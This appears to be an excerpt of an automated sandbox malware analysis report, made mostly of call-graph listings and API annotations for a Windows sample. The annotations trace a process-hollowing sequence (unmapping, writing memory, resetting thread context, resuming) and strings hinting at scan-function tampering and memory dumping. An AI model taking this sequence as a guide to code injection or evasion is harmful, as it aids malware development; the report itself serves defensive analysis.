2b0a233 38076->38077 38078 2af47ec 11 API calls 38077->38078 38079 2b0a264 38078->38079 38080 2b089d0 20 API calls 38079->38080 38081 2b0a288 38080->38081 38082 2af4860 11 API calls 38081->38082 38083 2b0a2a4 38082->38083 38084 2af47ec 11 API calls 38083->38084 38085 2b0a2d5 38084->38085 38086 2b089d0 20 API calls 38085->38086 38087 2b0a2f9 SetThreadContext NtResumeThread 38086->38087 38088 2af4860 11 API calls 38087->38088 38089 2b0a345 38088->38089 38090 2af47ec 11 API calls 38089->38090 38091 2b0a376 38090->38091 38092 2b089d0 20 API calls 38091->38092 38093 2b0a39a 38092->38093 38094 2af4860 11 API calls 38093->38094 38095 2b0a3b6 38094->38095 38096 2af47ec 11 API calls 38095->38096 38097 2b0a3e7 38096->38097 38098 2b089d0 20 API calls 38097->38098 38099 2b0a40b 38098->38099 38100 2af4860 11 API calls 38099->38100 38101 2b0a427 38100->38101 38102 2af47ec 11 API calls 38101->38102 38103 2b0a458 38102->38103 38104 2b089d0 20 API calls 38103->38104 38105 2b0a47c 38104->38105 38106 2af4860 11 API calls 38105->38106 38107 2b0a498 38106->38107 38108 2af47ec 11 API calls 38107->38108 38109 2b0a4c9 38108->38109 38110 2b089d0 20 API calls 38109->38110 38111 2b0a4ed 38110->38111 38112 2af2c2c 11 API calls 38111->38112 38113 2b0a4fc 38112->38113 38114 2af4860 11 API calls 38113->38114 38115 2b0a51e 38114->38115 38116 2af47ec 11 API calls 38115->38116 38117 2b0a54f 38116->38117 38118 2b089d0 20 API calls 38117->38118 38119 2b0a573 38118->38119 38120 2b0894c 21 API calls 38119->38120 38121 2b0a587 38120->38121 38122 2b0894c 21 API calls 38121->38122 38123 2b0a59b 38122->38123 38124 2b0894c 21 API calls 38123->38124 38125 2b0a5af 38124->38125 38126 2af4860 11 API calls 38125->38126 38127 2b0a5cb 38126->38127 38128 2af47ec 11 API calls 38127->38128 38129 2b0a5fc 38128->38129 38130 2b089d0 20 API calls 38129->38130 38131 2b0a620 38130->38131 38132 2b0894c 21 API calls 38131->38132 38133 2b0a634 38132->38133 38134 2b0894c 21 API calls 38133->38134 38135 2b0a648 38134->38135 38136 2af4860 11 API calls 38135->38136 38137 2b0a664 38136->38137 38138 2af47ec 11 API calls 38137->38138 38139 2b0a682 38138->38139 38140 2b0894c 21 API calls 38139->38140 38141 2b0a69a 38140->38141 38142 2af4860 11 API calls 38141->38142 38143 2b0a6b6 38142->38143 38144 2af47ec 11 API calls 38143->38144 38145 2b0a6d4 38144->38145 38146 2b0894c 21 API calls 38145->38146 38147 2b0a6ec 38146->38147 38148 2b0894c 21 API calls 38147->38148 38149 2b0a700 38148->38149 38150 2b0894c 21 API calls 38149->38150 38151 2b0a714 38150->38151 38152 2b0894c 21 API calls 38151->38152 38153 2b0a728 38152->38153 38154 2b0894c 21 API calls 38153->38154 38155 2b0a73c 38154->38155 38156 2af4860 11 API calls 38155->38156 38157 2b0a758 38156->38157 38158 2af47ec 11 API calls 38157->38158 38159 2b0a776 38158->38159 38160 2b0894c 21 API calls 38159->38160 38161 2b0a78e 38160->38161 38162 2af4860 11 API calls 38161->38162 38163 2b0a7aa 38162->38163 38164 2af47ec 11 API calls 38163->38164 38165 2b0a7c8 38164->38165 38166 2b0894c 21 API calls 38165->38166 38167 2b0a7e0 38166->38167 38168 2af4860 11 API calls 38167->38168 38169 2b0a7fc 38168->38169 38170 2af47ec 11 API calls 38169->38170 38171 2b0a81a 38170->38171 38172 2b0894c 21 API calls 38171->38172 38173 2b0a832 38172->38173 38174 2af4860 11 API calls 38173->38174 38175 2b0a84e 38174->38175 38176 2af47ec 11 API calls 38175->38176 38177 2b0a86c 38176->38177 38178 2b0894c 21 API calls 38177->38178 38179 2b0a884 38178->38179 38180 2b0894c 21 API calls 38179->38180 38181 2b0a8a3 38180->38181 38182 2b0894c 21 API calls 38181->38182 38182->37796 38184 2af4530 11 API calls 38183->38184 38185 2b085df 38184->38185 38186 2af4860 11 API calls 38185->38186 38187 2b085fe 38186->38187 38188 2b081cc 17 API calls 38187->38188 38189 2b08611 38188->38189 38190 2b08274 15 API calls 38189->38190 38191 2b08617 WinExec 38190->38191 38192 2b08639 38191->38192 38193 2af44dc 11 API calls 38192->38193 38194 2b08641 38193->38194 38194->37071 38195->37129 38196->37286 38197->37341 38198->37463 38199->37293 38200->37387 38202 2af49a4 GetFileAttributesA 38201->38202 38202->37781 38204 2af4530 11 API calls 38203->38204 38205 2b08425 38204->38205 38206 2b0798c 12 API calls 38205->38206 38207 2b08432 38206->38207 38208 2af47ec 11 API calls 38207->38208 38209 2b0843f 38208->38209 38210 2b081cc 17 API calls 38209->38210 38211 2b08452 38210->38211 38212 2b08274 15 API calls 38211->38212 38213 2b08458 NtReadVirtualMemory 38212->38213 38214 2b08486 38213->38214 38215 2af4500 11 API calls 38214->38215 38216 2b08493 38215->38216 38216->37946 38216->37947 38218 2af4530 11 API calls 38217->38218 38219 2b08695 38218->38219 38220 2b0798c 12 API calls 38219->38220 38221 2b086a2 38220->38221 38222 2af47ec 11 API calls 38221->38222 38223 2b086af 38222->38223 38224 2b081cc 17 API calls 38223->38224 38225 2b086c2 38224->38225 38226 2b08274 15 API calls 38225->38226 38227 2b086c8 NtUnmapViewOfSection 38226->38227 38228 2b086e8 38227->38228 38229 2af4500 11 API calls 38228->38229 38230 2b086f5 38229->38230 38230->37987 38230->37988 38232 2af4530 11 API calls 38231->38232 38233 2b07a51 38232->38233 38234 2b0798c 12 API calls 38233->38234 38235 2b07a5e 38234->38235 38236 2af47ec 11 API calls 38235->38236 38237 2b07a6b 38236->38237 38238 2b081cc 17 API calls 38237->38238 38239 2b07a7e 38238->38239 38240 2b08274 15 API calls 38239->38240 38241 2b07a84 NtAllocateVirtualMemory 38240->38241 38242 2b07ab5 38241->38242 38243 2af4500 11 API calls 38242->38243 38244 2b07ac2 38243->38244 38244->37958 38246 2af2c10 11 API calls 38245->38246 38247 2b08cb6 38246->38247 38247->38030 38248 2b1d2fc 38258 2af656c 38248->38258 38252 2b1d32a 38263 2b1c35c timeSetEvent 38252->38263 38254 2b1d334 38255 2b1d342 GetMessageA 38254->38255 38256 2b1d352 38255->38256 38257 2b1d336 TranslateMessage DispatchMessageA 38255->38257 38257->38255 38259 2af6577 38258->38259 38264 2af4198 38259->38264 38262 2af42ac SysFreeString SysReAllocStringLen SysAllocStringLen 38262->38252 38263->38254 38265 2af41de 38264->38265 38266 2af4257 38265->38266 38270 2af43e8 38265->38270 38278 2af4130 38266->38278 38269 2af4419 38283 2af435c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 38269->38283 38270->38269 38273 2af442a 38270->38273 38272 2af4423 38272->38273 38274 2af446f FreeLibrary 38273->38274 38275 2af4493 38273->38275 38274->38273 38276 2af449c 38275->38276 38277 2af44a2 ExitProcess 38275->38277 38276->38277 38279 2af4173 38278->38279 38280 2af4140 38278->38280 38279->38262 38280->38279 38281 2af15cc VirtualAlloc 38280->38281 38284 2af5868 38280->38284 38281->38280 38283->38272 38285 2af5878 GetModuleFileNameA 38284->38285 38286 2af5894 38284->38286 38288 2af5acc GetModuleFileNameA RegOpenKeyExA 38285->38288 38286->38280 38289 2af5b4f 38288->38289 38290 2af5b0f RegOpenKeyExA 38288->38290 38306 2af5908 12 API calls 38289->38306 38290->38289 38292 2af5b2d RegOpenKeyExA 38290->38292 38292->38289 38293 2af5bd8 lstrcpynA GetThreadLocale GetLocaleInfoA 38292->38293 38297 2af5c0f 38293->38297 38298 2af5cf2 38293->38298 38294 2af5b74 RegQueryValueExA 38295 2af5bb2 RegCloseKey 38294->38295 38296 2af5b94 RegQueryValueExA 38294->38296 38295->38286 38296->38295 38297->38298 38300 2af5c1f lstrlenA 38297->38300 38298->38286 38301 2af5c37 38300->38301 38301->38298 38302 2af5c5c lstrcpynA LoadLibraryExA 38301->38302 38303 2af5c84 38301->38303 38302->38303 38303->38298 38304 2af5c8e lstrcpynA LoadLibraryExA 38303->38304 38304->38298 38305 2af5cc0 lstrcpynA LoadLibraryExA 38304->38305 38305->38298 38306->38294

                                                                                                                                                                                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02B08D70 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654threadnativeinjectionCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 6027 2b08d70-2b08d73 6028 2b08d78-2b08d7d 6027->6028 6028->6028 6029 2b08d7f-2b08e66 call 2af4990 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 6028->6029 6060 2b0a8b7-2b0a921 call 2af4500 * 2 call 2af4c60 call 2af4500 call 2af44dc call 2af4500 * 2 6029->6060 6061 2b08e6c-2b08f47 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 6029->6061 6061->6060 6105 2b08f4d-2b09275 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af30d4 * 2 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4de0 call 2af4df0 call 2b08788 6061->6105 6214 2b09277-2b092e3 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 6105->6214 6215 2b092e8-2b09609 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af2ee0 call 2af2f08 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 GetThreadContext 6105->6215 6214->6215 6215->6060 6323 2b0960f-2b09872 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2b08400 6215->6323 6396 2b09878-2b099e1 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2b08670 6323->6396 6397 2b09b7f-2b09beb call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 6323->6397 6486 2b099e3-2b09a09 call 2b07a2c 6396->6486 6487 2b09a0b-2b09a77 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 6396->6487 6424 2b09bf0-2b09d70 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2b07a2c 6397->6424 6424->6060 6528 2b09d76-2b09e6f call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2b08c80 6424->6528 6496 2b09a7c-2b09b73 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2b07a2c 6486->6496 6487->6496 6567 2b09b78-2b09b7d 6496->6567 6579 2b09e71-2b09ebe call 2b08b78 call 2b08b6c 6528->6579 6580 2b09ec3-2b0a61b call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2b07d78 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2b07d78 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 SetThreadContext NtResumeThread call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af2c2c call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2b0894c * 3 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 6528->6580 6567->6424 6579->6580 6805 2b0a620-2b0a8b2 call 2b0894c * 2 call 2af4860 call 2af49a0 call 2af47ec call 2af49a0 call 2b0894c call 2af4860 call 2af49a0 call 2af47ec call 2af49a0 call 2b0894c * 5 call 2af4860 call 2af49a0 call 2af47ec call 2af49a0 call 2b0894c call 2af4860 call 2af49a0 call 2af47ec call 2af49a0 call 2b0894c call 2af4860 call 2af49a0 call 2af47ec call 2af49a0 call 2b0894c call 2af4860 call 2af49a0 call 2af47ec call 2af49a0 call 2b0894c call 2b08080 call 2b0894c * 2 6580->6805 6805->6060
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B089D0: FreeLibrary.KERNEL32(741D0000,00000000,00000000,00000000,00000000,02B7738C,Function_0000662C,00000004,02B7739C,02B7738C,05F5E103,00000040,02B773A0,741D0000,00000000,00000000), ref: 02B08AAA
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B08814
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetThreadContext.KERNEL32(00000890,02B77424,ScanString,02B773A8,02B0A93C,UacInitialize,02B773A8,02B0A93C,ScanBuffer,02B773A8,02B0A93C,ScanBuffer,02B773A8,02B0A93C,UacInitialize,02B773A8), ref: 02B09602
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B08471
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08670: NtUnmapViewOfSection.NTDLL(?,?), ref: 02B086D5
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B07A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B07A9F
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B07D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B07DEC
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetThreadContext.KERNEL32(00000890,02B77424,ScanBuffer,02B773A8,02B0A93C,ScanString,02B773A8,02B0A93C,Initialize,02B773A8,02B0A93C,00000894,003FAFF8,02B774FC,00000004,02B77500), ref: 02B0A317
                                                                                                                                                                                                                                                                                                                                                                                                                          • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000890,00000000,00000890,02B77424,ScanBuffer,02B773A8,02B0A93C,ScanString,02B773A8,02B0A93C,Initialize,02B773A8,02B0A93C,00000894,003FAFF8,02B774FC), ref: 02B0A324
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0894C: LoadLibraryW.KERNEL32(bcrypt,?,00000890,00000000,02B773A8,02B0A587,ScanString,02B773A8,02B0A93C,ScanBuffer,02B773A8,02B0A93C,Initialize,02B773A8,02B0A93C,UacScan), ref: 02B08960
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B0897A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000890,00000000,02B773A8,02B0A587,ScanString,02B773A8,02B0A93C,ScanBuffer,02B773A8,02B0A93C,Initialize), ref: 02B089B6
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: LibraryMemoryThreadVirtual$ContextFree$AddressAllocateCreateLoadProcProcessReadResumeSectionUnmapUserViewWrite
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2388221946-51457883
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 5a91eed34830aebca879b6b24bf6242815e0d1e74a7ad06714c1d512bc6becfd
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: f2450e9b1980b492511c3b3965f5cc6cd8ddd1b123a225b16afe01e3452b1ca5
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a91eed34830aebca879b6b24bf6242815e0d1e74a7ad06714c1d512bc6becfd
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3CE2EF35B806199BDB52FBA4D9C0BCFB7BAAF88300F1045E1B705AB254DE34AE458F51
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02B08D6E Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 6883 2b08d6e-2b08d73 6885 2b08d78-2b08d7d 6883->6885 6885->6885 6886 2b08d7f-2b08e66 call 2af4990 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 6885->6886 6917 2b0a8b7-2b0a921 call 2af4500 * 2 call 2af4c60 call 2af4500 call 2af44dc call 2af4500 * 2 6886->6917 6918 2b08e6c-2b08f47 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 6886->6918 6918->6917 6962 2b08f4d-2b09275 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af30d4 * 2 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4de0 call 2af4df0 call 2b08788 6918->6962 7071 2b09277-2b092e3 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 6962->7071 7072 2b092e8-2b09609 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af2ee0 call 2af2f08 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 GetThreadContext 6962->7072 7071->7072 7072->6917 7180 2b0960f-2b09872 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2b08400 7072->7180 7253 2b09878-2b099e1 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2b08670 7180->7253 7254 2b09b7f-2b09beb call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 7180->7254 7343 2b099e3-2b09a09 call 2b07a2c 7253->7343 7344 2b09a0b-2b09a77 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 7253->7344 7281 2b09bf0-2b09d70 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2b07a2c 7254->7281 7281->6917 7385 2b09d76-2b09e6f call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2b08c80 7281->7385 7353 2b09a7c-2b09b7d call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2b07a2c 7343->7353 7344->7353 7353->7281 7436 2b09e71-2b09ebe call 2b08b78 call 2b08b6c 7385->7436 7437 2b09ec3-2b0a8b2 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2b07d78 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2b07d78 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 SetThreadContext NtResumeThread call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af2c2c call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2b0894c * 3 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2b0894c * 2 call 2af4860 call 2af49a0 call 2af47ec call 2af49a0 call 2b0894c call 2af4860 call 2af49a0 call 2af47ec call 2af49a0 call 2b0894c * 5 call 2af4860 call 2af49a0 call 2af47ec call 2af49a0 call 2b0894c call 2af4860 call 2af49a0 call 2af47ec call 2af49a0 call 2b0894c call 2af4860 call 2af49a0 call 2af47ec call 2af49a0 call 2b0894c call 2af4860 call 2af49a0 call 2af47ec call 2af49a0 call 2b0894c call 2b08080 call 2b0894c * 2 7385->7437 7436->7437 7437->6917
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B089D0: FreeLibrary.KERNEL32(741D0000,00000000,00000000,00000000,00000000,02B7738C,Function_0000662C,00000004,02B7739C,02B7738C,05F5E103,00000040,02B773A0,741D0000,00000000,00000000), ref: 02B08AAA
